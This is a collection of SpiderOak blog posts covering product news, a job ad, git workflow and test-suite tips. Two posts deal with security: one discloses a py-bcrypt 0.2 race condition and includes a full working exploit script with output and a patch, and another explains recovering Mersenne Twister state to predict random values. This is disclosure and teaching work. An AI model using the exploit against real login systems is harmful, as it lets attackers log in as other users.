Conversations about life & privacy in the digital age

Ask American computer security expert, Jon Callas

You know that crazy interview question, “If you could have dinner with any famous person, living or dead, who would it be?”

Well, someone the other night answered, Jon Callas. Perhaps there are several of you out there with interest in the world of cryptography and information security and would also enjoy the opportunity to ask him some questions.

While we can’t set up a dinner meeting between you with Jon, we can pass along your questions. Jon has graciously granted us the opportunity to send over our readers’ most burning questions for him to answer.

Take the weekend to submit your questions in the comment section and the folks over here at SpiderOak will pick the best 10 to be submitted to Jon.

Who knows, maybe you’ll get a dinner out of this afterall…

Security Vulnerability in Py-Bcrypt 0.2

This blog post is probably only interesting to programmers. Regular SpiderOak users can safely ignore this article. (It is not related to the SpiderOak backup and sync software.)

There’s a security vulnerability with py-bcrypt.

The vulnerability allows an attacker (“Eve”) to login as any user by making a
login attempt with a bogus password, overlapping in thread execution with the
user’s own login attempt. Typically many such attempts will be needed, but one will
eventually succeed.

This is a synchronization vulnerability with concurrent use of the
encrypted static buffer in bcrypt.c. Only threaded applications should be
vulnerable. It is common to use threads for bcrypt auth since it can cause an
event driven application to block the event loop for an unacceptable time.

I went looking through the py-bcrypt code after noticing suspicious patterns of
auth failures while testing a project using bcrypt.

The vulnerability was added in bcrypt 0.2 which was href="http://www.mindrot.org/projects/py-bcrypt/news/rel02.html">released in
July 2010.

This vulnerability is not present in bcrypt 0.1 because it did not release the
GIL during bcrypt operations.

Prior discovery? Sönke Schau href="https://code.google.com/p/py-bcrypt/issues/detail?id=12">reported a
thread safety bug in this area to the Google Code project back in January 2013.
It seems from the description (i.e. Priority: Medium) that the security
implications were unclear at the time.

Below is a demo exploit, sample output from the demo, a patch to py-bcrypt to mitigate the vulnerability, and output from the demo after patching.

The maintainers published an update within an hour of my initial message (wow!) There’s now a py-bcrypt 0.3 available on Google Code and PyPI.


#!/usr/bin/env python
"""
demo exploit for py-bcrypt 0.2

The demo below includes a server class with one user, alice,
with a bcrypted password.  The server is event driven using
Twisted with bcrypt operations deferred into a thread pool.
Eve tries to login repeatedly with a bogus password while
Alice is also trying to log in.
"""

import time
import random
import sys
import bcrypt
from twisted.internet import reactor, defer
from twisted.python import log
from twisted.internet.threads import deferToThread

# if we instead set this bcrypt work factor to 4 (the minimum) the demo exploit
# succeeds much sooner.  12 is the default.
BCRYPT_LOG_ROUNDS = 12

def salt_and_bcrypt(password):
    "return the salted and bcrypted representation of a password"
    salt = bcrypt.gensalt(BCRYPT_LOG_ROUNDS)
    return bcrypt.hashpw(password, salt)

def check_bcrypt(password, crypted):
    "return boolean, comparing a plain password to a bcrypt stored value"
    check_value = bcrypt.hashpw(password, crypted)
    return check_value == crypted 

def sleep_to_delay_thread(delay):
    "just used to add additional noise into the timing of the thread pool"
    time.sleep(delay)
    return True

class DemoExploitableServer(object):
    """
    Simple server class.  This could be a web server, ftp, RPC, etc.

    The same vulnerability exists if the server is available over a network.
    Here everything happens in one process for brevity.
    """

    users = dict(alice = salt_and_bcrypt("mypassword"))

    def __init__(self, num_busywork_threads):
        self._login_attempt_count = 0
        self.exploited = False
        self.halt = False
        if num_busywork_threads:
            reactor.callLater(0, self._simulate_activity, num_busywork_threads)

    def notify_shutdown(self):
        "notify the server that the event loop is shutting down"
        self.halt = True

    def login(self, username, password):
        """
        make a login attempt to the server.
        Return a Deferred that will be called back with the login result bool
        """

        if self.halt:
            # just ignore forever
            deferred = defer.Deferred()
            return deferred

        self._login_attempt_count += 1

        # show some progress in the log. usually don't get that far.
        if self._login_attempt_count % 1000 == 0:
            log.msg("%d login trials" % ( self._login_attempt_count, ))

        # delayed False on nonexistent user
        if not username in self.users:
            deferred = defer.Deferred()
            reactor.callLater(5, deferred.callback, False)
            return deferred

        return deferToThread(check_bcrypt, password, self.users[username])

    def _simulate_activity(self, amount):
        "start N busy work loops (deferring work to thread pool)"
        for _ in range(amount):
            reactor.callLater(0, self._do_busy_work)

    def _do_busy_work(self):
        "defer a random blocking sleep call to a thread"
        if self.halt:
            return
        delay = 2.0 * random.random()
        deferred = deferToThread(sleep_to_delay_thread, delay)
        deferred.addCallback(self._busy_work_callback)

    def _busy_work_callback(self, _result):
        "repeat the busy work cycle"
        reactor.callLater(0, self._do_busy_work)

class UserBase(object):
    "base for Alice and Eve--users repeatedly trying to login to the server"
    def __init__(self, server):
        self._server = server

    def run(self):
        "start the login trial loop"
        reactor.callLater(0, self.try_login)

    def try_login(self):
        "make a login attempt.  The server will callback with the result"
        deferred = self._server.login(self._username, self._password)
        deferred.addCallback(self._login_callback)
        deferred.addErrback(log.err)

class Alice(UserBase):
    """
    Alice repeatedly tries to login w/ the correct password.
    It's normal that she succeeds, and noteworthy when she fails.
    """
    _username = 'alice'
    _password = 'mypassword'
    def _login_callback(self, result):
        if not result:
            log.msg("alice login failure")
        reactor.callLater(0, self.run)

class Eve(UserBase):
    """
    Eve repeatedly tries to login as Alice w/ a bogus password.
    The exploit is successful when Eve's login is valid.
    """
    _username = 'alice'
    _password = 'WRONG_PASSWORD'
    def _login_callback(self, result):
        if result:
            log.msg("eve login success")
            self._server.exploited = True
            reactor.stop()
        else:
            log.msg("eve login fail")
        reactor.callLater(0, self.run)

def spawn_user(server, user_class):
    """
    create a user instance, and schedule delay calls to the event loop to start the
    instance's login trial loop
    """
    new_user = user_class(server)
    reactor.callLater(0, new_user.run)

def run_exploit_demo():
    """
    setup the demo exploitable server instance and a few user instances trying
    to login.  Manage the event loop startup/shutdown. Report results.

    Return shell exit code: 1 on exploit failure, 0 on success"
    """
    num_alice = 5
    num_eve = 5
    server_busywork_threads = 5

    log.startLogging(sys.stdout)

    server = DemoExploitableServer(server_busywork_threads)

    for _ in range(num_alice):
        spawn_user(server, Alice)

    for _ in range(num_eve):
        spawn_user(server, Eve)

    # timeout after an hour
    def _timeout():
        log.msg("timeout reached")
        reactor.stop()

    reactor.callLater(3600, _timeout)

    reactor.suggestThreadPoolSize(30)

    reactor.addSystemEventTrigger("before", "shutdown", server.notify_shutdown)

    reactor.run()

    # if we get here, Eve has logged in or we have crashed or timed out
    if server.exploited:
        print "EXPLOITED: successful login by Eve as Alice"
        return 0
    else:
        print "NO exploit"
        return 1

if __name__ == '__main__':
    sys.exit(run_exploit_demo())


Here’s sample output, before and after patching.

ubuntu@dev$ /opt/py2.7.vulnerable_bcrypt/bin/python pybcrypt_exploit_poc.py
2013-03-17 18:42:31+0000 [-] Log opened.
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login fail
2013-03-17 18:42:31+0000 [-] eve login success
2013-03-17 18:42:33+0000 [-] Main loop terminated.
2013-03-17 18:42:33+0000 [-] EXPLOITED: successful login by Eve as Alice
ubuntu@dev$ /opt/py2.7/bin/python pybcrypt_exploit_poc.py
... [ snip ] ...
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] eve login fail
2013-03-17 19:08:17+0000 [-] timeout reached
2013-03-17 19:08:19+0000 [-] Main loop terminated.
2013-03-17 19:08:19+0000 [-] NO exploit

I use C only very occasionally, but in case it’s helpful, here’s my attempt at a resolution patch. (Don’t use this. The patch provided by the maintainers in bcrypt-0.3 looks much more portable!)

diff -r py-bcrypt-0.2/bcrypt/bcrypt.c py-bcrypt-0.2.patched/bcrypt/bcrypt.c
75c75,84
< static char    encrypted[128];
---
> #undef threadlocal
>     #ifdef _ISOC11_SOURCE
>         #define threadlocal _Thread_local
>     #else
>         #define threadlocal __thread
>     #endif
>     /* we would rather blow up at compile time than be without thread safety.
>      * */
>
> static threadlocal char    encrypted[128];

Git, clients, partners, and woes.

This post comes from the “hindsight is twenty-twenty department.” A
few years ago when we started our
White Label program, we were
wondering how to manage the different client branding, GUI
customization, etc. Our first thought was “I know! We’ll use
git!”

Then we had two problems.

We used to use one branch in git per white label partner. The
intention was that we would then effortlessly merge across updates and
ship updates and have everything happy. Reality, however, quickly set
in. Every partner branch needed to be kept track of and manually
merged with HEAD. Being a distributed company, keeping git branch
discipline is bad enough when there’s one production branch, and much
worse when someone may commit last-minute bug fixes under the gun on a
completely different production branch. Once that happens, you need to
round up the branches and start merging back, up, down, and heaven
help you if you wind up with a mutually exclusive merge
conflict. Things wound up in a state where our white label clients
would lag months and months behind our production SpiderOak client at
best.

Our first attempt consolidated our generic white labels down to two
branches based on core GUI features included. This did a great job of
reducing complexity, but it still left many very interestingly
customized clients still in their own branches, and it left us needing
to make sure every branch was still lovingly merged and that fixes
accidentally committed to the wrong branch got brought everywhere
else. Something else was needed.

Our first step was to overhaul the builder, which we completed
recently. This gives us a flexible resource framework to drop in
everything from images to configuration files. The next step is to
boil down all our custom white label code into client code and builder
configuration files, which will again bring us back to one
production branch for everything we ship.

What does this mean for you, fair customer? The primary win is that
now, especially as we maintain
multiple
brands just under SpiderOak alone
these days, we will be able to work on features much more quickly and
deploy them to everyone. Bugs found by partners don’t get fixed only
for partners that report them, but for everyone. And finally, we get
only one, single place that we have to aim CI and testing tools. This
results in a far better SpiderOak experience.

And it sure results in a huge reduction in the amount of grey hairs
we accumulate with every release cycle. Our takeaway here at SpiderOak
is to really examine every new process we try to introduce for trying
to imagine even just a single year down the road. On the surface,
using git to manage different production releases of SpiderOak seemed
to be a splendid idea. After a couple of years? Worst. Idea. Ever.

Exploit Information Leaks in Random Numbers from Python, Ruby and PHP

The Mersenne Twister (MT 19937) is a pseudorandom number generator, used by Python and many other languages like Ruby, and PHP. It is known to pass many statistical randomness tests, but it’s also known to be not cryptographically secure. The Python documentation is clear on this point, describing it as “completely unsuitable for cryptographic purposes.” Here we will show why.

When you are able to predict pseudorandom numbers, you can predict session ids, randomly generated passwords or encryption keys and know all the cards in online poker games, or play “Asteroids” better than legally possible.

Many sources already showed that it’s easy to rebuild the internal state of the MT by using 624 consecutive outputs. But this alone isn’t a practical attack, it’s unlikely that you have access to the whole output. In this post I’ll demonstrate how to restore its internal state by using only parts of its output. This will allow us to know all previous and future random number generation.

With every 32bit output the MT directly exposes 32 bit of it’s internal state (only slightly and reversibly modified by the tempering function). After each round of 624 outputs, the internal state of the Mersenne Twister is “twisted” itself: All bits are XOR’d with several other bits. In fact the Mersenne Twister is just a big XOR machine: All its output can be expressed by an sequence of XORs of the initial state bits.

Python always combines two outputs into a 64bit integer before returning them as random integers. So each call of random.randint(0,255) gives you only 8 bits out of two 32 bit Mersenne Twister outputs. Since the tempering function already mixed the 32 bits outputs, it’s not possible anymore to directly recover internal state bits out of only the 8 bits.

I was curious if it’s hard to recover the internal MT state by using only the output of a function like this:

def random_string(length):
    return "".join(chr(random.randint(0, 255)) for i in xrange(length))

Since the internal state of the Mersenne Twister consists out of 19968 bits we will need at least ~2.5KB of output to recover the internal state. In fact I needed ~3.3kb, probably because of redundant output information. Also possible is a bug in my POC implementation :)

You can find the result on github.

How does it work?

First I named the initial state with variables s0…s19967. The initial state looks like this:

Internal state bit Value
0 s0
1 s1
19967 s19967

Now the first output of the Mersenne Twister is a combination of the first 32 bits (combined by the tempering function):

Output-Bit Value
o0 s0 xor s4 xor s7 xor s15
o1 s1 xor s5 xor s16
o2 s2 xor s6 xor s13 xor s17 xor s24
o31 s2 xor s9 xor s13 xor s17 xor s28 xor s31

same for the second output:

Output-Bit Value
o32 s32 xor s36 xor s39 xor s47,

But we can only observe eight of these bits, because random.randint(0,255) exposes only this portion of the output.

After 624 outputs, the internal state of the Mersenne Twister is “twisted” around. We update our internal state as an xor-combination of our old indices.

Internal state bit Value
0 s63 xor s12704
1 s0 xor s12705
19967 s61 xor s62 xor s5470 xor s5471 xor s18143

The outputs look now more complicated now, because the state bits are an xor-combination of the initial state:

Output-Bit Value
o19968 s35 xor s38 xor s46 xor s63 xor s12704 xor s12708 xor s12711 xor s12719

After 3.3 kb this list contains about 40 variables.

Now we have a big list of output-bits and how they are made out of an xor-combination of the original state. A big system of equations that we can to solve! This is done as you learned it at school: Here’s a simple example for 3 bits.

Given this equations system:

o1 = s0 xor s1 xor s2
o2 = s1 xor s2
o3 = s0 xor s1
 
First we solve s0:
 
o1 = s0 xor s1 xor s2
o2 = s1 xor s2
=>
o1 xor o2 = s0
 
With this solution it’s easy to find solution for s1.
 
o3 = s0 xor s1
o1 xor o2 = s0
=>
o1 xor o2 xor o3 = s1
 
And finally for s2.
 
o2 = s1 xor s2
o1 xor o2 xor o3 = s1
=>
o1 xor o3 = s2
 
Result:
 
o1 xor o2 = s0
o1 xor o2 xor o3 = s1
o1 xor o3 = s2

Now we know how to recover the 3-bit state out of our 3 output-bits:
s0 = o1 xor o2
s1 = o1 xor o2 xor o3
s2 = o1 xor o3

However, in reality we have about 26,000 equations with 20,000 variables.

If you want to try it yourself, you can download the the result of the solved equation together with a test-program on github.

Further notes

Since the Mersenne Twister is highly symmetric, it’s probably possible to find some shortcuts or a fully mathematical solution for this problem. However, I implemented the straight-forward solution since it’s easy and reusable.

Python seeds the Twister with only 128 bits of “real” randomness. So theoretically it’s enough to know a few output bytes to restore the whole state, but you would need an efficient attack on the seeding algorithm since 128 bit is too much for a brute-force attack.

However, other implementations use much less randomness to seed their random number generators. PHP seems to use only 32 bits for seeding mt_random, Perl also uses only 32 bit (but another PRNG). In these cases it’s probably easier to use a brute-force attack on the seed.

HTML5 Mobile Client Open Development Project

I’m happy to announce that SpiderOak will be proceeding with its development of the new mobile client as an open development project. We are eager to arrange greater access to progress, as it proceeds, and to provide more opportunities for interested users to contribute, in various ways.

This means that we will be continuing our work on the new, HTML5-based client application in the open, including open sourcing the code base and also conducting our planning and coordination as openly and transparently as we can.

Project Process

SpiderOak will continue to lead development of the client. Members of our team, including the developer who has been working on the code to date (me), will be dedicated to the project. (I have had substantial involvement in open source development, at a few points in my career. It’s the way I prefer to work, so I’m particularly pleased with this turn of events.)

We will use a repository methodology, Fork & Pull, which is organized so that many people, both inside and outside an organization, can be involved and contribute.

Last week we ported the internal code repository to a publicly accessible github repository in the SpiderOak github organization, and started staking out the milestones/issues in the repository tracker. We also started to port the documentation to the repository wiki from its former home, the docs subdirectory of the code section.

Besides basic project orientation, the document providing orientation on the code architecture and other technical details has been ported to the wiki.

(That document also includes info about running the application from local files – currently necessary for testing it. Specifically, in order to run the application, you have to clone a local copy of the repository, using git, and then use a specially conditioned browser session to visit it. We’re working on providing a proxy by which anyone can try current versions of the development code just by pointing your browser at the right address.)

Plans

By the end of the year, we aim (milestone), to implement a single core application, with platform variants, that has equivalent functionality to the existing iOS and Android native mobile clients. It is being implemented in HTML5 / CSS / Javascript, with hybrid (PhoneGap) native extensions to fill in functionality gaps.

That is just the beginning.

HTML5 and, particularly, Javascript is becoming increasingly capable as
mobile platforms, along with the mobile platforms. After the initial
release milestone we plan to incorporate full ‘Zero-Knowledge’ operation,
including cryptographic encryption, local to the devices – like what
happens in the desktop client. As new SpiderOak secure collaboration
features emerge, we will implement them in this mobile client.

We are also excited about the possibility of using elements of the mobile HTML5 code as a common basis for desktop and browser HTML5 clients. The possible economies of sharing components between the desktop and mobile, plus the higher-level UI framing – HTML5/CSS/Javascript versus pyQt – may make it worth our while to re-engineer the desktop, and realize the benefits of greater development agility in the whole range, mobile to desktop, going forward.

Why Open Source/Free Software?

There are many reasons to conduct development of the HTML5 mobile client based on open source.

  • In general, we want to enable maximum access to SpiderOak services, including enabling others to use our code to inform their own efforts to use our services.

  • More, though, we want to arrange so that you, our users, can have thorough access, and not be in the dark about what is coming. You can help us understand what you need, and what we’re overlooking. You can contribute – help each other answer questions, fill in documentation gaps, identify problems and fix and devise code.

  • Some of the functionality we plan to implement will rely on innovations, like Javascript-based cryptography. Those innovations will be most useful to us, as well as to others, if they can be taken up and refined and strengthened by widespread use, beyond our projects. An open development process can help promote that kind of effect.

  • Ultimately, SpiderOak’s founders, and the team they have gathered in the company, have accumulated deep experience with and benefits from open source/free software. We see those benefits increasing, for us as well as for others, by applying open methodologies to development of this and other projects.

How Can You Get Involved?

Opening this project allows anyone to evaluate and contribute, not just code, but also designs, plans, and ideas that will be discussed online.

We are just starting this as an open development project, and will have some shaking out to do – as well as an end-of-the-year deadline that is first priority – but we are looking forward to shaping a good collaboration, with your help, and have started the steps to enable it.

Now Hiring –> JavaScript / HTML5 Engineer

We’re looking for an excited JavaScript hacker to join us and help us
advance state-of-the-art technology implementation in
JavaScript. We’re looking to do some Cool New Things on the web that
have been traditionally limited to our desktop client, and need
someone who can help us push that along.

Do you enjoy trying to push the bounds of browser-boxed computing?
Have you experience with cryptography? Enjoy getting that last little
bit of performance out of V8 as Chrome makes your computer levitate
with the cooling fans spinning up? We want you! You’ll be working with
our existing team of web engineers to bring out new technology and
products allowing people to use SpiderOak in a private fashion no
matter where they are or what kind of device they are on. You’ll be
working on HTML5 webapps with more and more JavaScript getting pushed
further and further beyond the competition.

To hop on board and immediately get rolling, we expect that you
have a grasp of or can very rapidly come up to speed on a wide variety
of technologies around HTML5, including but not limited to:

You’ll have to be comfortable dealing with SQL for data, as well as a
Unix platform for deployment (Ubuntu, specifically). We have an
emphasis on test-driven development that you will be jumping in
to. Finally, our backend software is all in Python, and knowing that
is a major plus but not immediately necessary- if you already know
the above, chances are you can learn a new language if it comes to
that.

If you want to join in on our merry adventure, you will need a
functional grasp of English (don’t worry, we have several staff
on-board already for whom it’s a second or third language). You will
also be expected to occasionally travel (at company expense) to have
some quality face-to-face time. Important cities in the SpiderOakVerse
are San Francisco, CA, Kansas City, MO, and Chicago, IL (for
reference, these three cities make up about half of SpiderOak). A
sense of humor is always appreciated and welcome.

Still interested? Send an email to
jobs@spideroak.com including “web engineer” in
the subject with a little about yourself and your experience to date
(a ‘cover letter’ if you will). NOTE: Resumes are not required as who
you are is more important than what your resume may or may not say. If
we enjoy your thoughts and feel like you will be a good fit, we will
send you a small task to complete. Please do be sure to tell us a bit
about yourself, what you can do, and why you’d like to work for
us. English only, please.

We know there’s talent in everyone regardless of what little papers
might say, so we have no “minimum” requirements for degrees. We’re
also super-equal-opportunity: quality hacking knows no bounds for
race, gender, nationality, sexual orientation, species[1], or
religion. If you can meet what we need, we’ll do amazing things
together, no matter who, what, or where you are.

Footnotes:

1: The Management would prefer llamas with experience in piloting
luxury yachts.

Speeding up and running legacy test suites, part two

This is part two in a two part series on Test Driven Development at
SpiderOak. In
part one,
I discussed ways to decrease the time it takes to run a test suite. In part
two, I discuss two ways to run a test suite that are painful if the tests are
slow, but greatly beneficial if performed often with fast tests.

Once we have tests that run in milliseconds rather than minutes, we’ll want
to run them as often as possible. As I work, I’m constantly saving the current
file and running the tests, as is necessary when practicing test-driven
development. Rather than switching to a command prompt after each change in
order to run the tests, I just map a key in vim to do it automatically.

Whenever I start a programming session, I open the module I’m working on and
its corresponding test module in a vertical split in vim. SpiderOak has a few
runtime dependencies, and because we don’t use the system-provided Python
interpreter on Mac, I have to source a script to set up the runtime
environment. When running commands from vim, the environment is inherited, so
by sourcing the script before running vim, things work just as they would if
you invoke them from the command line directly.

$ (. /opt/so2.7/bin/env.sh; PYTHONPATH=some_path vim -O package/module.py package/test/test_module.py)

Once I’m in vim, I map a key to run the tests, modifying the mapping for
whatever module I happen to be working on.

:map ,t :w:!python -m package.test.test_module

This binds ,t to first write the file, then run python -m
package.test.test_module
. Of course, this will change depending on what
you’re working on and how you invoke your tests.

Running tests on a range of git commits

In my git workflow, I sometimes find myself staging changes piecemeal, or
rebasing, reordering, or squashing commits. These kinds of actions can lead to
commits with code in a state that hasn’t been tested. To make testing these
intermediate states easier, I have adapted

a script from Gary Bernhardt
to checkout each commit in a given range and
run a command on the result. Here’s my adapted version of the script:

#!/bin/bash
set -e

ORIG_HEAD=$(git branch | grep '^*' | sed "s/^* //" | grep -v '^(no branch)' || true)
REV_SPEC=$1
shift

git rev-list --reverse $REV_SPEC | while read rev; do
    echo "Checking out: $(git log --oneline -1 $rev)"
    git checkout -q $rev
    find . -name "*.pyc" -exec rm {} ;
    "$@"
done
if [ $? -eq 0 ]; then
    [ -n $ORIG_HEAD ] && git checkout -q $ORIG_HEAD
fi

This keeps track of the current HEAD, checks out each revision in the
provided range, and then runs whatever command follows the range on the command
line. If all goes well, it will check out the original HEAD, to leave you back
where you started. If at any point the command exits with an error code, the
process will stop, so you can fix the problem.

For example, to run the command python test/run_all_tests.py on
every commit between origin/master and the current HEAD, you would
run:

$ ./run_command_on_git_revisions.sh origin/master.. python test/run_all_tests.py

Using the tools and techniques from this post and href="/blog/20121015153905-speeding-up-and-running-legacy-test-suites-part-one">part
one, I am able to run the SpiderOak tests quickly, after every change. This
enables me to use a TDD approach and not be slowed down by sluggish tests. With
the confidence that a comprehensive suite of tests provides, I can make
sweeping changes to parts of the SpiderOak code without worrying if I broke
something. Moreover, if I’m unsure of a solution, I can just try something and
see if it works. Because I’m not slowed down by the tests, trying an unproven
solution is rarely too large of an investment. Plus, there’s something
satisfying about making a large test suite pass in the blink of an eye.

Speeding up and running legacy test suites, part one

This is part one in a two part series on Test Driven Development at SpiderOak.
In part one, I discuss ways to decrease the time it takes to run a test suite.
In part two, I’ll discuss two ways to run a test suite that are painful if the
tests are slow, but greatly beneficial if performed often with fast tests.

As any experienced developer will likely say, the longer a test suite takes to
run, the less often it will be run. A test suite that is seldom run can be
worse than no test suite at all, as production code behavior diverges from that
of the tests, possibly leading to a test suite that lies to you about the
correctness of your code. A top priority, therefore, for any software
development team that believes testing is beneficial, should be to maintain
fast tests.

Over the years, SpiderOak has struggled with this. The reason, and I suspect
many test suites run slowly for similar reasons, is tests which claim to be
testing a “unit”, but actually end up running code from many parts of the
system. In the early days of SpiderOak we worked around some of the problem by
caching, saving/restoring state using test fixtures, etc. But a much better
approach, which we’re in the process of implementing, is to make unit tests
actually test small units rather than entire systems. During the
transition, we still have the existing heavy tests to fall back on, but for
day-to-day development, small unit tests profoundly increase productivity.

There are many techniques for keeping tests small and fast, and even more for
transitioning a legacy test suite. Each code base will ultimately require its
own tricks, but I will outline a few here that we’ve adopted at SpiderOak.

Mocks

Mock objects are “stand-in” objects that replace parts of your code that are
expensive to set up or perform, such as encryption, network or disk access,
etc. Using mocks can greatly improve the running time of your tests. At
SpiderOak, we use Michael Foord’s excellent
Mock library.

One area where mocking has been particularly helpful in speeding up the legacy
tests in SpiderOak is by reducing startup time. In some cases, even if
individual tests run quickly, running the test suite can still take a long time
due to unnecessary startup costs, such as importing modules unrelated to the
code under test. To work around this, I often inject a fake module into
Python’s import system to avoid loading huge amounts of code orthogonal to what
I’m trying to test. As an example, at the top of a test module, you might see
the following:

import sys
from test.util import Bucket

# don't waste time importing the real things, since we're isolating anyway
sys.modules['foo'] = Bucket()
sys.modules['foo.bar'] = sys.modules['foo'].bar

import baz

How it works

When you import a module in Python, the interpreter first looks for it in
sys.modules. This speeds up subsequent imports of a module that has already
been imported. We can also take advantage of this fact to prevent importing of
bloated modules altogether, by sticking a lightweight fake object in there,
which will get imported instead of the real code.

In the example above, foo is a bloated module that takes a long time to load,
and baz is the module under test. baz imports foo, so without this
workaround, the test would take a long time to load as it imports foo. Since
we’re writing isolated unit tests, using Mocks to replace things in foo, we
can skip importing foo for the tests altogether, saving time.

Bucket is a simple class that I use whenever I need an object on which I can
access an arbitrary path of attributes. This is perfect for fake package/module
structures, so I often use it for this purpose.

from collections import defaultdict

class Bucket(defaultdict):
    def __init__(self, *args, **kw):
        super(Bucket, self).__init__(Bucket, *args, **kw)
        self.__dict__ = self

This class allows you to access arbitrary attributes and get another Bucket
back. For example:

bucket = Bucket()
some_object = bucket.some.path.to.some_object
assert type(some_object) == Bucket

A caveat: since Python imports packages and modules recursively, you need to insert each
part of the dotted path into sys.modules for this to work. As you can see, I
have done this for foo.bar in the example from above.

sys.modules['foo'] = Bucket()
sys.modules['foo.bar'] = sys.modules['foo'].bar

Ideally, using an isolated approach to TDD with Mock objects, your project
would never evolve into a state where importing modules takes a long time, but
when working with a legacy codebase, the above approach can sometimes help your
tests run faster, which means they’ll be run more often, during the transition.

Next, part two will outline two ways to run your tests regularly. After all, a
test suite is only useful when it is actually used.

A note to our Tech-Savvy, Forward-Thinking SpiderOak Users. Yes – We’re Talking to You!

An Open Letter to Our Tech-Savvy Forward-Thinking Users:

We wanted to send our utmost admiration and gratitude. Great activity continues as we and our industry grow and push forward. Much of what we have developed and the choices we have made since our 2007 inception has been because of you – our wonderful user base.

We also wanted to make you aware of two big recent announcements to cross our wire (if you haven’t seen them just yet):

  1. We launched our new website &
  2. We entered the Enterprise market with SpiderOak Blue

Breaking through these milestones, we wanted to thank our roots. Thank you for embracing the importance of privacy with us, steering us towards better design, a more comprehensive product experience, and demanding more of us and our strengths. Thanks to those of you who pushed us from your role in your company’s IT department or as CTO toward breaking through into the enterprise space.

We love our relationship with you and want to stay true to that. Keep the feedback coming in the wonderful honest and detailed form it has taken. And thank you – above all – for your continued patronage and support.

We look forward to serving you for many years ahead as we continue to prove that one doesn’t have to sacrifice privacy for the benefits obtained in the cloud…

We remain grateful,

The SpiderOak Team

Zero-Knowledge 101: What It Is & What It Means to You

Welcome to SpiderOak University. If you’re a student, new user, or a lover of continuous learning, this month we’re talking to you.

We’ll be posting a couple video shorts each week where SpiderOak CEO Ethan Oberman uses a whiteboard to explain some of our basic product functionalities. School yourself and keep an eye out for our next POP QUIZon Friday so you can receive extra GBs.

Who can you trust? This is an important question in today’s race to the cloud. We’ve worked hard over the past six years to build a trustworthy product that upholds user privacy above all else. SpiderOak CEO Ethan Oberman explains how SpiderOak developed its ‘Zero-Knowledge’ privacy policy, what it is, and how it works.

Do you have a .edu email address? Don’t forget – you can enjoy 50% off your private backup/sync/share account:

Sign up today.